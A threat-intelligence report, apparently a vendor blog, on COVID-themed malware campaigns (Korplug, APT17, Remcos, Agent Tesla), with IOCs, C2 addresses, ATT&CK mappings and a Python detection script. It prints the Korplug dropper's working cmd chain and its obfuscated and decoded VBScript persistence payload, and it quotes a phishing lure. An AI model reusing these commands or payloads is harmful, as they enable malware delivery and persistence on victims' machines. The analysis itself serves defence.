MITRE ATT&CK™ Mapping


  • T1033 - System Owner/User Discovery (Discovery): Adversaries may attempt to identify the primary user, the currently logged-in user, the set of users that commonly use a system, or whether a user is actively using the system.
  • T1041 - Exfiltration Over Command and Control Channel (Exfiltration): Data exfiltration is performed over the Command and Control channel. Data is encoded into the normal communications channel using the same protocol as command and control communications.
  • T1055 - Process Injection (Defense Evasion, Privilege Escalation): Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
  • T1081 - Credentials in Files (Credential Access): Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
  • T1082 - System Information Discovery (Discovery): An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
  • T1193 - Spearphishing Attachment (Initial Access): Spearphishing attachment is a specific variant of spearphishing. It differs from other forms of spearphishing in that it employs malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution.
  • T1204 - User Execution (Execution): An adversary may rely upon specific actions by a user in order to gain execution. This may be direct code execution, such as when a user opens a malicious executable delivered via Spearphishing Attachment with the icon and apparent extension of a document file.
  • T1071 - Standard Application Layer Protocol (Command & Control): Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Indicators of Compromise (IOC)

File name: AWARENESS NOTICE ON CORONAVIRUS COVID-19 DOCUMENT_zip.arj

MD5: bac2f22d53c6f2b43eba6adbb0f2ea9a

SHA1: 2073403dc04dd90140135e0cce1b504d5fcc6876

SHA256: f7b0d6d95f2644e32c22eb3e681e33387ac27d71dd73eee3ff37ce77985ab177

File name: AWARENESS NOTICE ON CORONAVIRUS COVID-19 DOCUMENT_pdf.exe

MD5: 9498ba71b33e9e9e19c352579e0d1b0a

SHA1: 39419cf0c4a2aec86db7e87aaecf2972ed7cddb6

SHA256: da26ba1e13ce4702bd5154789ce1a699ba206c12021d9823380febd795f5b002

Command & Control

  • hxxp://academydea[.]com/alhaji/Panel/five/fre.php - Call home
  • hxxp://academydea[.]com/alhaji/Panel/five/PvqDq929BSx_A_D_M1n_a.php - Admin interface

At the time of analysis, 'academydea[.]com' resolved to '165.227.16[.]98'


 

Korplug Malware Spread Leveraging the WHO Lure

Mar. 23, 2020

Cyberint Research detected a suspicious .zip file called covid.zip submitted to a public AV scanner from China.

File name: covid.zip

SHA256: 0977aebba030684c623612741999865932f9aff7e9ea8111b7323154c2f03f0f

File Size: 872725 bytes

Tags: Archive

The file contains an .lnk file masquerading as a PDF, called covid.pdf.lnk (NB! the .lnk extension is not visible when viewing the file in Windows Explorer).

File name: covid.pdf.lnk

SHA256: 95489af84596a21b6fcca078ed10746a32e974a84d0daed28cc56e77c38cc5a8

File Size: 1160121 bytes

Tags: Dropper, lnk 

The file size is suspicious, as .lnk files are usually small. When analyzing the content of the .lnk file, the following script can be seen:

The shortcut's target is %SystemRoot%\system32\cmd.exe (stored as the relative path !..\..\..\Windows\System32\cmd.exe) and it passes the following arguments:

/c copy "20200308-sitrep-48-covid-19.pdf.lnk" %tmp%\\g4ZokyumBB2gDn.tmp /y&for /r C:\\Windows\\System32\\ %i in (*ertu*.exe) do copy %i %tmp%\\msoia.exe /y&findstr.exe "TVNDRgAAAA" %tmp%\\g4ZokyumBB2gDn.tmp>%tmp%\\cSi1r0uywDNvDu.tmp&%tmp%\\msoia.exe -decode %tmp%\\cSi1r0uywDNvDu.tmp %tmp%\\oGhPGUDC03tURV.tmp&expand %tmp%\\oGhPGUDC03tURV.tmp -F:* %tmp% &wscript %tmp%\\9sOXN6Ltf0afe7.js

The shortcut data is followed by an embedded base64 blob beginning with "TVNDRgAAAA", which the command above carves out of the .lnk file with findstr.

 

The .lnk file acts as a dropper and drops the following files to the %temp% directory:

File name: g4ZokyumBB2gDn.tmp

SHA256: 95489AF84596A21B6FCCA078ED10746A32E974A84D0DAED28CC56E77C38CC5A8

File Size: 1160121 bytes

Tags: Dropper, lnk

 

File name: msoia.exe

SHA256: 589229E2BD93100049909EDF9825DCE24FF963A0C465D969027DB34E2EB878B4

File Size: 889856 bytes

Tags: Signed, Trusted, Certutil

 

File name: cSi1r0uywDNvDu.tmp

SHA256: 9D52D8F10673518CB9F19153DDBE362ACC7CA885974A217A52D1EE8257F22CFC

File Size: 5061 bytes

Tags: COM, Embedded VBS, XML

 

The embedded script within the .lnk file looks for the base64 string "TVNDRgAAAA", which decodes to "MSCF", the header of a Microsoft Cabinet (CAB) archive, using the following command:

findstr.exe "TVNDRgAAAA" C:\Users\admin\AppData\Local\Temp\\g4ZokyumBB2gDn.tmp

As soon as it is found, it calls msoia.exe, a renamed certutil.exe, to decode the CAB file using the following command line:

C:\Users\admin\AppData\Local\Temp\\msoia.exe -decode C:\Users\admin\AppData\Local\Temp\\cSi1r0uywDNvDu.tmp C:\Users\admin\AppData\Local\Temp\\oGhPGUDC03tURV.tmp

Following that, it extracts the CAB file under the %temp% directory using the following command

expand C:\Users\admin\AppData\Local\Temp\\oGhPGUDC03tURV.tmp -F:* C:\Users\admin\AppData\Local\Temp

The expand command extracts the following files

File name: 20200308-sitrep-48-covid-19.pdf

SHA256: 2DD886CC041EA6E5E80880CCBBC54BE42079598ACF0C1E7E459616C3F9C0DD34

File Size: 856853 bytes

Tags: Decoy, Legitimate, PDF

 

File name: 486AULMsOPmf6W.tmp

SHA256: 604679789C46A01AA320EB1390DA98B92721B7144E57EF63853C3C8F6D7EA85D

File Size: 87352 bytes

Tags: Legitimate, Signed

 

File name: 3UDBUTNY7YstRc.tmp

SHA256: A49133ED68BEBB66412D3EB5D2B84EE71C393627906F574A29247D8699F1F38E

File Size: 32768 bytes

Tags: DLL, Korplug

 

File name: 9sOXN6Ltf0afe7.js

SHA256: 70B8397F87E4A0D235D41B00A980A8BE9743691318D30293F7AA6044284FFC9C

File Size: 792 bytes

Tags: JavaScript, Loader

 

File name: cSi1r0uywDNvDu.tmp

SHA256: 9D52D8F10673518CB9F19153DDBE362ACC7CA885974A217A52D1EE8257F22CFC

File Size: 5061 bytes

Tags: Korplug, Loader

The first file is the legitimate PDF from the World Health Organization (WHO) discussing the COVID-19 global pandemic to deflect any suspicion from the victim. In the background the loader calls wscript.exe with the following command:

wscript C:\Users\admin\AppData\Local\Temp\\9sOXN6Ltf0afe7.js

9sOXN6Ltf0afe7.js is a simple JavaScript loader that executes the following command

cmd /c mkdir %tmp%\\cscript.exe&for /r C:\\Windows\\System32\\ %m in (cscr*.exe) do copy %m %tmp%\\cscript.exe\\msproof.exe /y&move /Y %tmp%\\cSi1r0uywDNvDu.tmp %tmp%\\cscript.exe\\WsmPty.xsl&%tmp%\\cscript.exe\\msproof.exe //nologo %windir%\\System32\\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty&del \"%userprofile%\\OFFICE12\\Wordcnvpxy.exe\" /f /q&ping -n 1 127.0.0.1&move /Y %tmp%\\486AULMsOPmf6W.tmp \"%userprofile%\\OFFICE12\\MSOSTYLE.EXE\"&move /Y %tmp%\\3UDBUTNY7YstRc.tmp \"%userprofile%\\OFFICE12\\OINFO12.OCX\"&copy /b %tmp%\\2m7EBxdH3wHwBO.tmp+%tmp%\\MiZl5xsDRylf0W.tmp \"%userprofile%\\OFFICE12\\Wordcnvpxy.exe\" /Y&\"%tmp%\\20200308-sitrep-48-covid-19.pdf\"",0

The JS loader creates a folder called cscript.exe under the %tmp% directory, copies cscript.exe from %systemroot%\System32 to the newly created directory and saves it as msproof.exe using the following command:

C:\Windows\System32\cmd.exe" /c mkdir C:\Users\admin\AppData\Local\Temp\cscript.exe&for /r C:\Windows\System32\ %m in (cscr*.exe) do copy %m C:\Users\admin\AppData\Local\Temp\cscript.exe\msproof.exe

It then moves cSi1r0uywDNvDu.tmp from the %temp% directory and saves it as WsmPty.xsl using the following command:

msproof.exe /y&move /Y C:\Users\admin\AppData\Local\Temp\cSi1r0uywDNvDu.tmp C:\Users\admin\AppData\Local\Temp\cscript.exe\WsmPty.xsl

WsmPty.xsl is an XSL stylesheet with an embedded VBScript block. The payload is stored as a hex string that the script decodes at runtime; the decoding loop XORs each byte with 0, so it is effectively a plain hex decode:

<?xml version='1.0'?>

<stylesheet

xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"

xmlns:user="placeholder"

version="1.0">

<output method="text"/>

 <ms:script implements-prefix="user" language="VBScript">

 <![CDATA[

 rBOH7OLTCVxzkH=HrtvBsRh3gNUbe("2044696D206C466C464578466563467546744665462C6A43657A734E534A544B4D684F796D2C6A506B57746C4E69476F686D67664C7679644F2C57746C4E69534A544B4665634675460D0A206C466C46457846656346754674466546203D204372656174654F626A6563742822577363726970742E5368656C6C22292E456E7669726F6E6D656E74282250726F6365737322292E4974656D28225553455250524F46494C4522290D0A206A43657A734E534A544B4D684F796D203D204372656174654F626A6563742822577363726970742E5368656C6C22292E456E7669726F6E6D656E74282250726F6365737322292E4974656D282254454D5022290D0A2044696D20466B46694668466546616C467446684661466E642C20467769466E4664466F7773467479466C4665460D0A2053657420466B46694668466546616C467446684661466E64203D204372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422290D0A20467769466E4664466F7773467479466C466546203D206C466C4645784665634675467446654626225C4F46464943453132220D0A20496620466B46694668466546616C467446684661466E642E666F6C64657245786973747328467769466E4664466F7773467479466C46654629205468656E0D0A20456C73650D0A20466B46694668466546616C467446684661466E642E437265617465466F6C64657228467769466E4664466F7773467479466C466546290D0A20456E642049660D0A206A506B57746C4E69476F686D67664C7679644F203D206A43657A734E534A544B4D684F796D26225C326D37454278644833774877424F2E746D70220D0A206D4A645A71546D4B744C7657674A7743286A506B57746C4E69476F686D67664C7679644F29200D0A2044696D206843787269754475445A72526E756C66736D784F4D4F6D6A5565417142664E6D43524A4A5373666B6A2C5642784A446A42704F4258476977677770414F597569746A774C70594B5973776A63612C7763486D5A5A566D456E45547843554256775A5865766E4F5661650D0A20736574206843787269754475445A72526E756C66736D784F4D4F6D6A5565417142664E6D43524A4A5373666B6A3D4372656174654F626A6563742822575363726970742E5368656C6C22290D0A205642784A446A42704F4258476977677770414F597569746A774C70594B5973776A63613D6843787269754475445A72526E756C66736D784F4D4F6D6A5565417142664E6D43524A4A5373666B6A2E5370656369616C466F6C6465727328225374617274757022290D0A20736574207763486D5A5A566D456E45547843
554256775A5865766E4F5661653D6843787269754475445A72526E756C66736D784F4D4F6D6A5565417142664E6D43524A4A5373666B6A2E43726561746553686F7274637574285642784A446A42704F4258476977677770414F597569746A774C70594B5973776A6361202620225C4163636573736F726965732E6C6E6B22290D0A207763486D5A5A566D456E45547843554256775A5865766E4F5661652E54617267657450617468203D2022433A5C57696E646F77735C53797374656D33325C72756E646C6C33322E657865220D0A207763486D5A5A566D456E45547843554256775A5865766E4F5661652E57696E646F775374796C65203D20310D0A207763486D5A5A566D456E45547843554256775A5865766E4F5661652E576F726B696E674469726563746F72793D5642784A446A42704F4258476977677770414F597569746A774C70594B5973776A63610D0A207763486D5A5A566D456E45547843554256775A5865766E4F5661652E417267756D656E7473203D2022433A5C57696E646F77735C73797374656D33325C75726C2E646C6C2C46696C6550726F746F636F6C48616E646C65722022266368722833342926467769466E4664466F7773467479466C46654626225C4D534F5354594C452E6578652226636872283334290D0A207763486D5A5A566D456E45547843554256775A5865766E4F5661652E536176650D0A2057746C4E69534A544B466563467546203D20467769466E4664466F7773467479466C46654626225C5C4D534F5354594C452E657865220D0A2046756E6374696F6E206D4A645A71546D4B744C7657674A77432846696C654E616D65290D0A202020202044696D206D49714C7A497242635A69466A5661492C206D496A467A527751734B7752634176412C206D48705863426F436E4E744C755764500D0A2020202020536574206D496A467A527751734B775263417641203D204372656174654F626A65637428224D6963726F736F66742E584D4C444F4D22290D0A2020202020536574206D48705863426F436E4E744C75576450203D206D496A467A527751734B7752634176412E437265617465456C656D656E74282262696E61727922290D0A2020202020536574206D49714C7A497242635A69466A566149203D204372656174654F626A656374282241444F44422E53747265616D22290D0A20202020206D48705863426F436E4E744C755764502E4461746154797065203D202262696E2E686578220D0A20202020206D48705863426F436E4E744C755764502E54657874203D2022344435413930220D0A20202020206D49714C7A497242635A69466A5661492E54797065203D20310D0A20202020206D49714C7A497242635A69466A5661
492E4F70656E0D0A20202020206D49714C7A497242635A69466A5661492E5772697465206D48705863426F436E4E744C755764502E4E6F6465547970656456616C75650D0A20202020206D49714C7A497242635A69466A5661492E53617665546F46696C652046696C654E616D652C20320D0A20202020206D49714C7A497242635A69466A5661492E436C6F73650D0A2020202020536574206D49714C7A497242635A69466A566149203D204E6F7468696E670D0A2020202020536574206D48705863426F436E4E744C75576450203D204E6F7468696E670D0A2020202020536574206D496A467A527751734B775263417641203D204E6F7468696E670D0A20456E642046756E6374696F6E"):execute(rBOH7OLTCVxzkH):function HrtvBsRh3gNUbe(bhhz6HalbOkrki):for rBOH7OLTCVxzkH=1 to len(bhhz6HalbOkrki)step 2:HrtvBsRh3gNUbe=HrtvBsRh3gNUbe&chr(asc(chr("&h"&mid(bhhz6HalbOkrki,rBOH7OLTCVxzkH,2)))xor 0):next:end function:

 ]]> </ms:script>

</stylesheet>

Once decoded, it clearly shows the script creating a persistence mechanism:

Dim lFlFExFecFuFtFeF,jCezsNSJTKMhOym,jPkWtlNiGohmgfLvydO,WtlNiSJTKFecFuF

 lFlFExFecFuFtFeF = CreateObject("Wscript.Shell").Environment("Process").Item("USERPROFILE")

 jCezsNSJTKMhOym = CreateObject("Wscript.Shell").Environment("Process").Item("TEMP")

 Dim FkFiFhFeFalFtFhFaFnd, FwiFnFdFowsFtyFlFeF

 Set FkFiFhFeFalFtFhFaFnd = CreateObject("Scripting.FileSystemObject")

 FwiFnFdFowsFtyFlFeF = lFlFExFecFuFtFeF&"\OFFICE12"

 If FkFiFhFeFalFtFhFaFnd.folderExists(FwiFnFdFowsFtyFlFeF) Then

 Else

 FkFiFhFeFalFtFhFaFnd.CreateFolder(FwiFnFdFowsFtyFlFeF)

 End If

 jPkWtlNiGohmgfLvydO = jCezsNSJTKMhOym&"\2m7EBxdH3wHwBO.tmp"

 mJdZqTmKtLvWgJwC(jPkWtlNiGohmgfLvydO) 

 Dim hCxriuDuDZrRnulfsmxOMOmjUeAqBfNmCRJJSsfkj,VBxJDjBpOBXGiwgwpAOYuitjwLpYKYswjca,wcHmZZVmEnETxCUBVwZXevnOVae

 set hCxriuDuDZrRnulfsmxOMOmjUeAqBfNmCRJJSsfkj=CreateObject("WScript.Shell")

 VBxJDjBpOBXGiwgwpAOYuitjwLpYKYswjca=hCxriuDuDZrRnulfsmxOMOmjUeAqBfNmCRJJSsfkj.SpecialFolders("Startup")

 set wcHmZZVmEnETxCUBVwZXevnOVae=hCxriuDuDZrRnulfsmxOMOmjUeAqBfNmCRJJSsfkj.CreateShortcut(VBxJDjBpOBXGiwgwpAOYuitjwLpYKYswjca & "\Accessories.lnk")

 wcHmZZVmEnETxCUBVwZXevnOVae.TargetPath = "C:\Windows\System32\rundll32.exe"

 wcHmZZVmEnETxCUBVwZXevnOVae.WindowStyle = 1

 wcHmZZVmEnETxCUBVwZXevnOVae.WorkingDirectory=VBxJDjBpOBXGiwgwpAOYuitjwLpYKYswjca

 wcHmZZVmEnETxCUBVwZXevnOVae.Arguments = "C:\Windows\system32\url.dll,FileProtocolHandler "&chr(34)&FwiFnFdFowsFtyFlFeF&"\MSOSTYLE.exe"&chr(34)

 wcHmZZVmEnETxCUBVwZXevnOVae.Save

 WtlNiSJTKFecFuF = FwiFnFdFowsFtyFlFeF&"\\MSOSTYLE.exe"

 Function mJdZqTmKtLvWgJwC(FileName)

     Dim mIqLzIrBcZiFjVaI, mIjFzRwQsKwRcAvA, mHpXcBoCnNtLuWdP

     Set mIjFzRwQsKwRcAvA = CreateObject("Microsoft.XMLDOM")

     Set mHpXcBoCnNtLuWdP = mIjFzRwQsKwRcAvA.CreateElement("binary")

     Set mIqLzIrBcZiFjVaI = CreateObject("ADODB.Stream")

     mHpXcBoCnNtLuWdP.DataType = "bin.hex"

     mHpXcBoCnNtLuWdP.Text = "4D5A90"

     mIqLzIrBcZiFjVaI.Type = 1

     mIqLzIrBcZiFjVaI.Open

     mIqLzIrBcZiFjVaI.Write mHpXcBoCnNtLuWdP.NodeTypedValue

     mIqLzIrBcZiFjVaI.SaveToFile FileName, 2

     mIqLzIrBcZiFjVaI.Close

     Set mIqLzIrBcZiFjVaI = Nothing

     Set mHpXcBoCnNtLuWdP = Nothing

     Set mIjFzRwQsKwRcAvA = Nothing

 End Function

The VBS script creates persistence using an .lnk file called Accessories.lnk under the Startup directory.

It launches rundll32.exe, which loads MSOSTYLE.EXE (an old Microsoft Office WBEM component); by abusing the DLL search order, MSOSTYLE.EXE is hijacked into loading OINFO12.OCX, which is the Korplug DLL component.

Once completed, it launches winrm.vbs (a legitimate vbs script responsible for interacting with Windows Remote Management) using the following command

msproof.exe //nologo C:\Windows\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty

When Windows Remote Management is running on the local machine, the command will return an XML schema of the basic machine information like the operating system version and more.

The loader then deletes C:\Users\admin\OFFICE12\Wordcnvpxy.exe and executes ping.exe with one ICMP packet to 127.0.0.1. It then moves 486AULMsOPmf6W.tmp and 3UDBUTNY7YstRc.tmp from the %temp% directory to OFFICE12\ using the following command:

move /Y C:\Users\admin\AppData\Local\Temp\486AULMsOPmf6W.tmp "C:\Users\admin\OFFICE12\MSOSTYLE.EXE"&move /Y C:\Users\admin\AppData\Local\Temp\3UDBUTNY7YstRc.tmp "C:\Users\admin\OFFICE12\OINFO12.OCX"

MSOSTYLE.EXE is a legitimate file, part of the Microsoft Office package; OINFO12.OCX is the Korplug DLL. The loader then concatenates 2m7EBxdH3wHwBO.tmp and MiZl5xsDRylf0W.tmp into Wordcnvpxy.exe using the following command:

copy /b C:\Users\admin\AppData\Local\Temp\2m7EBxdH3wHwBO.tmp+C:\Users\admin\AppData\Local\Temp\MiZl5xsDRylf0W.tmp "C:\Users\admin\OFFICE12\Wordcnvpxy.exe" /Y&"C:\Users\admin\AppData\Local\Temp\20200308-sitrep-48-covid-19.pdf"

A persistence mechanism is then set by dropping an lnk file called Accessories.lnk under the Startup directory that points to MSOSTYLE.EXE, the loader then launches the decoy PDF.

The Korplug payload is executed when the system reboots and the user logs in, via the Accessories.lnk described earlier.

Korplug then communicates with its C2 hxxp://motivation[.]neighboring[.]site/01/index.php which was down at the time of analysis.

 

MITRE ATT&CK™ Mapping

  • T1059 - Command-Line Interface (Execution)
  • T1106 - Execution through API (Execution)
  • T1129 - Execution through Module Load (Execution)
  • T1064 - Scripting (Defense Evasion, Execution)
  • T1060 - Registry Run Keys / Startup Folder (Persistence)
  • T1012 - Query Registry (Discovery)
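An added example, not part of the original analysis, that turns the execution chain described above into process-creation detection rules: certutil running under another name (caught through the PE's original file name), a base64 literal that decodes to the "MSCF" CAB header, expand -F:* into a temp directory, a directory named like an executable, winrm.vbs driven by a renamed script host, and rundll32 url.dll,FileProtocolHandler starting a user-profile binary. The Sysmon-style event fields and the sample events are constructed.

```python
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Process-creation record; field names follow Sysmon Event ID 1 (assumed schema)."""
    image: str                     # full path of the new process
    command_line: str
    original_file_name: str = ""   # PE version-info name, survives renaming on disk
    parent_image: str = ""


SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{8,}={0,2}")
EXE_AS_DIR = re.compile(r'\\[^\\"]+\.exe\\', re.I)   # e.g. ...\Temp\cscript.exe\msproof.exe


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def b64_literal_decodes_to(token: str, magic: bytes) -> bool:
    """True if a base64 literal begins with `magic` once decoded (pads as needed)."""
    try:
        raw = base64.b64decode(token + "=" * (-len(token) % 4))
    except ValueError:            # binascii.Error is a ValueError
        return False
    return raw.startswith(magic)


def korplug_indicators(ev: ProcEvent) -> list[str]:
    """Return the rules from the chain above that this event trips (empty = clean)."""
    img, cmd = basename(ev.image), ev.command_line
    low = cmd.lower()
    reasons = []
    # certutil running under another file name (msoia.exe in this campaign)
    if ev.original_file_name.lower() == "certutil.exe" and img != "certutil.exe":
        reasons.append(f"renamed certutil ({img})")
    # certutil-style -decode of a file in a temp directory
    if " -decode " in low and "\\temp\\" in low:
        reasons.append("-decode of a temp file")
    # a base64 literal on the command line that decodes to a CAB header
    for tok in B64_TOKEN.findall(cmd):
        if b64_literal_decodes_to(tok, b"MSCF"):
            reasons.append(f"base64 CAB header literal {tok}")
            break
    # expand.exe unpacking every member of a cabinet
    if img == "expand.exe" and "-f:*" in low:
        reasons.append("expand -F:* of a cabinet")
    # a directory whose name ends in .exe anywhere in the image path or command line
    if EXE_AS_DIR.search(ev.image + " " + cmd):
        reasons.append("executable-named directory in path")
    # winrm.vbs driven by something other than the genuine script hosts
    if "winrm.vbs" in low and img not in SCRIPT_HOSTS:
        reasons.append(f"winrm.vbs launched by {img}")
    # rundll32 url.dll,FileProtocolHandler used as a proxy to start a user-profile binary
    if img == "rundll32.exe" and "url.dll,fileprotocolhandler" in low and "\\users\\" in low:
        reasons.append("rundll32 FileProtocolHandler launching from user profile")
    return reasons


def hunt(events):
    """(image basename, reasons) for every event that tripped at least one rule."""
    return [(basename(e.image), r) for e in events if (r := korplug_indicators(e))]


TMP = r"C:\Users\admin\AppData\Local\Temp"
# Constructed sample events modelled on the chain described above, plus one benign event.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c copy "20200308-sitrep-48-covid-19.pdf.lnk" %tmp%\g4ZokyumBB2gDn.tmp /y'
              r'&findstr.exe "TVNDRgAAAA" %tmp%\g4ZokyumBB2gDn.tmp>%tmp%\cSi1r0uywDNvDu.tmp',
              "Cmd.Exe"),
    ProcEvent(TMP + r"\msoia.exe",
              TMP + r"\msoia.exe -decode " + TMP + r"\cSi1r0uywDNvDu.tmp " + TMP + r"\oGhPGUDC03tURV.tmp",
              "CertUtil.exe", r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\expand.exe",
              "expand " + TMP + r"\oGhPGUDC03tURV.tmp -F:* " + TMP, "expand.exe"),
    ProcEvent(TMP + r"\cscript.exe\msproof.exe",
              r"msproof.exe //nologo C:\Windows\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty",
              "cscript.exe"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe",
              r'rundll32.exe C:\Windows\system32\url.dll,FileProtocolHandler "C:\Users\admin\OFFICE12\MSOSTYLE.exe"',
              "RUNDLL32.EXE"),
    ProcEvent(r"C:\Windows\System32\certutil.exe", "certutil -verify server.cer", "CertUtil.exe"),
]

if __name__ == "__main__":
    for name, reasons in hunt(SAMPLE_EVENTS):
        print(f"{name}: {'; '.join(reasons)}")
```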

 

 

APT17 Attacks Kyrgyzstan Officials

Mar. 19, 2020

Cyberint Research discovered an attack believed to be targeting government agencies in Kyrgyzstan.

The lure document discusses budget discussions between the president of Kyrgyzstan and the country's Minister of Finance.

We assess with high confidence that this attack is attributable to WINNTI (a.k.a. APT17, a China-based threat group).

 

File Name: President discusses budget savings due to coronavirus with Finance Minister.rtf

SHA256: 1527f7b9bdea7752f72ffcd8b0a97e9f05092fed2cb9909a463e5775e12bd2d6

Size: 574379 bytes

Tags: CVE-2017-11882, OLE-Embedded

The lure document exploits the CVE-2017-11882 vulnerability in the Microsoft Equation Editor (EQNEDT32.exe).

Once successfully exploited, the document drops the following files to the %AppData% directory:

File Name: LBTServ.dll

SHA256: 6ADAED0828D5D2BE09D20091769959B6A66E112B7140E3F03C0D6FCE72B7D07C

File Size: 139264 bytes

Tags: Backdoor, Winnti

File Name: confax.exe

SHA256: 7AADCB53CA413648EBA86D01490038D4C0763BCEB5875ABCEB10DA12D4D6A2DD

File Size: 54394 bytes

Tags: Signed, Trusted

confax.exe is a legitimately signed binary, part of the Logitech Bluetooth Wizard Host Process. When executed, it loads LBTServ.dll into memory and the malware then beacons to the following C2 servers:

Domain: ru.mst.dns-cloud.net

IP Address: 185.206.180.130

Port: 301053

Tags: C2, GR

Domain: brands.newst.dnsabr.com

IP Address: 45.76.218.232

Port: 301053

Tags: C2, JP

The C2 servers were down at the time of analysis.

Malware Distributing the Remcos Information Stealer 

Mar. 18, 2020

Cyberint detected a malware campaign distributing the Remcos information stealer using a malicious macro-enabled Excel document.

File Name: (COVID-19) conseils au grand public.xlam

SHA256: 9C764371C5DAE46831D70D615406CB9CE2DE643B8A22FA16404AD1D0F65ADC7D

File Size: 809472 bytes

Tags: CVE-2017-11882, Macro-Enabled, Maldoc

The macro-enabled excel document exploits the CVE-2017-11882 vulnerability - a vulnerability in the Microsoft Equation Editor EQNEDT32.EXE that allows arbitrary remote code execution.

Once successfully exploited, it downloads a file named putty.exe and saves it as vbc.exe under the %AppData% directory

File Name: vbc.exe

SHA256: AF1CF572150E95FD75306A13EB3D2306E1E1FB4EF6C238F53F30F2525389E07B

File Size: 343552 bytes

Tags: InfoStealer, Remcos

Following that, it executes the malware, which drops two files under the %USERPROFILE%\ADyASg directory:

  1. a VBS loader - ADyASgAQK.vbs
  2. a copy of the Remcos payload - ADyAS.exe

The malware sets persistence under the following registry value, which points to the VBS loader:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ADyAS

The Remcos malware then spawns InstallUtil.exe and injects its payload into the InstallUtil.exe process. As a next step, the malware does the following:

  1. starts a keylogger to collect user keystrokes
  2. collects browser login information
  3. collects email credentials

Finally, the information gets exfiltrated to an attacker controlled C2 Network.

C2: 185.19.85.141

Port: 8855

Tags: C2, Custom Protocol

 

Malware Distributing the Agent Tesla Information Stealer 

Mar. 18, 2020

A recent malware campaign distributing the well-known Agent Tesla information stealer is using the recent uncertainty around the Coronavirus/COVID-19 pandemic. 

In some cases the threat actors use .7z files containing the Agent Tesla payload.

File Name: ALL UPDATED INFORMATION FROM CDC ON COVID-19 IN YOUR AREA.7z

SHA256: 51eab875208923d82953fd3492b2efab3dc1d234c555a2db9dcd45e840a9040c

File Size: 20679 bytes

File Name: ALL UPDATED INFORMATION FROM CDC ON COVID-19 IN YOUR AREA.exe

SHA256: 8a9feda526489531ffb275a88b4c70bf7fe92c7807503c3654cf926ff9bb7d85

File Size: 73728 bytes

Once executed on a victim's machine, the Agent Tesla information stealer collects information from the following applications:

  • Chrome
  • Firefox
  • Internet Explorer
  • Yandex
  • Opera
  • Outlook
  • Yahoo
  • Thunderbird
  • IncrediMail
  • Eudora
  • FileZilla
  • WinSCP
  • FTP Navigator
  • Paltalk
  • Internet Download Manager
  • JDownloader
  • Apple keychain
  • SeaMonkey
  • Comodo Dragon
  • CoolNovo
  • Torch
  • UC Browser
  • Flock
  • TheBat!
  • PocoMail
  • FoxMail
  • Opera Mail
  • Pidgin
  • NO-IP
  • PostBox
  • WinSCP
  • CoreFTP
  • FTPCom
  • IDM
  • FlashFXP
  • WS_FTP
  • SmartFTP
  • DynDNS

 

 

Using additional pivots, the Cyberint Research team was able to discover more samples related to the same campaign:

File Name: FIRST REPORT SANGER COVID-19 03172020.exe

SHA256: 9950271ed3154e6c8fcc70a76b96027c74a4996af6e60e9a13a7d09eff21ef07

File Size: 73728 bytes

File Name: HONNIN.exe

SHA256: b43448c2ff98abf1cc917734afb72378e1ae209b680e54810219fb2b73689476

File Size: 53248 bytes

 

COVID-19 Malware Targeting APAC

Mar. 17, 2020

Threat actors have been quick to leverage the global fear and uncertainty that COVID-19 brings and use it to launch and distribute malware campaigns using phishing to gain access to their victims' machines. 

CyberInt research detected a significant spike in COVID-19-related attacks, which will continue to grow as long as the uncertainty around COVID-19 exists. We will continue to provide intelligence and recommendations to be able to act most effectively against cyber threats. The following analysis addresses phishing emails targeting potential victims across South-East Asia.

A recent campaign detected and observed by CyberInt research involves a phishing email targeting the academia sector in South East Asia. The phishing email appears to be sent by the World Health Organization (WHO), containing instructions and guidelines following the COVID-19 outbreak.

Dear Sir,

In view of the recent spread of the 2019- nCoV disease in China and nearby countries, all agents are hereby requested to inform their Master of the Vessels calling at port to follow the below mentioned guidelines issued by Port Health Office,  and send the duly filled documents to the email ids mentioned in the forms 

ADVISORY ON 2019 NOVEL CORONA VIRUS – REG.

INSTRUCTIONS TO SHIP MASTERS BY WHO AND PORT AUTHORITY

  1.   The ship Master are to follow the required documents as per the instructions and submit by email minimum 2-3 days before arrival.
  2.   All ship calling from Chinese Ports are to give temperature report by email for 2 days before arrival or as instructed by email by PHO. The temperature to be measured by Ship designated Medical Officer with Non touch thermometers in small batches only. If the Mercury thermometer is used, to mention temperature taken in Axilla or Oral in your report. Necessary precautions to be taken to sanitize mercury thermometers between measurements.
  3.   All newly joined crew are to be monitored on board for 14 days.
  4.   If they develop any signs & symptoms of 2019-nCoV virus they are to be isolated on board and contact the RMA or nearest Port Health Authority.
  5.   The ship must have stocks of 3 layered surgical masks 30 per crew, hand wash liquid or hand soap 5 per crew, Hand Drying Paper roll for all common wash basins and toilets, 10 PPE kit for Infectious diseases, Bio Hazard Bags 25 pcs for safe disposal of masks, PPE kits.
